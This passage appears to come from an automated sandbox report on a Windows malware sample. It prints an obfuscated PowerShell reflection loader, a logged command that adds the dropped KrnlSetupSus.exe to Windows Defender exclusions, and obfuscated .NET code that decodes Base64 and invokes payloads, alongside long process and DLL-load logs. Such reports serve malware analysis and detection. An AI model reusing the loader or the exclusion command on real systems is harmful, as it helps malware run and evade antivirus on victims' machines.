+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}
Source: C:\ProgramData\KrnlSetupSus.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Process created: C:\ProgramData\Install.exe "C:\ProgramData\Install.exe"
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Process created: C:\ProgramData\KrnlSetupSus.exe "C:\ProgramData\KrnlSetupSus.exe"
Source: C:\ProgramData\KrnlSetupSus.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
Source: C:\ProgramData\KrnlSetupSus.exe | Process created: unknown unknown
Source: C:\ProgramData\KrnlSetupSus.exe | Process created: unknown unknown
Source: C:\ProgramData\KrnlSetupSus.exe | Process created: unknown unknown
Source: C:\ProgramData\KrnlSetupSus.exe | Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Install.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\Install.exe | Section loaded: cryptsp.dll
Source: C:\ProgramData\Install.exe | Section loaded: rsaenh.dll
Source: C:\ProgramData\Install.exe | Section loaded: cryptbase.dll
Source: C:\ProgramData\Install.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Install.exe | Section loaded: taskschd.dll
Source: C:\ProgramData\Install.exe | Section loaded: sspicli.dll
Source: C:\ProgramData\Install.exe | Section loaded: taskschd.dll
Source: C:\ProgramData\Install.exe | Section loaded: taskschd.dll
Source: C:\ProgramData\Install.exe | Section loaded: xmllite.dll
Source: C:\ProgramData\Install.exe | Section loaded: taskschd.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: mscoree.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: version.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: sspicli.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: cryptsp.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: rsaenh.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: cryptbase.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: wbemcomn.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: amsi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: userenv.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: profapi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: wldp.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: rasapi32.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: rasman.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: rtutils.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: mswsock.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: winhttp.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: iphlpapi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: dnsapi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: winnsi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: rasadhlp.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: fwpuclnt.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: propsys.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: edputil.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: urlmon.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: iertutil.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: srvcli.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: netutils.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: wintypes.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: appresolver.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: bcp47langs.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: slc.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: sppc.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: pdh.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: sxs.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: mpr.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: scrrun.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: linkinfo.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ntshrui.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: cscapi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: secur32.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: schannel.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: mskeyprotect.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ntasn1.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ncrypt.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: ncryptsslp.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: msasn1.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: gpapi.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: avicap32.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: msvfw32.dll
Source: C:\ProgramData\KrnlSetupSus.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: ngcpopkeysrv.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: pcpksp.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: ntoskrnl.lnk.3.dr | LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\ntoskrnl.exe
Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: RdLfpZY5A9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RdLfpZY5A9.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ~1.PDB @7_9)ux source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.lOhl5wnS2VSCSFCfUYhD1FldO0r12gsrxIRLn95mRNYW,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.kb07IPurE12uyIzb2WxjbHZpaDnbCLPyrs27YGNBleTE,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.x9zJjYHF78RFXW7xEyarFX3sZQIPgnSv6seyvw32d3Ak,NX6lGwb3McFcQKpui0G08IJkdBCcVT9eXqEm5I79TRsa.Ml17yRaCyswdlPv3uPlaqX0lTTQ0bVtaIYbFeMY5GJ4Q,fBE1wflwwjJOP1BboN3oP.U7gxRGEVBV9XvesbpeHlO()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2],fBE1wflwwjJOP1BboN3oP.zbFKA3h0RY6TTT1PMhP2UR85XWXILLx7YgOhohB4lLMvKeoJfd6lk(Convert.FromBase64String(WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: KrnlSetupSus.exe.0.dr, ajIsSiZ8AS1co09CghkkWvl6HPbkrUc8slzdbVDZhhdhgQNmeDruBDHdY3QTrEzPCoaUNp9BALGv4SFjurU81RTN5uY6xN.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { WXxrAArJWY8XFp1YWN0McTEpspQwEI7GORy0[2] }}, (string[])null, (Type[])null, (bool[])null, true)
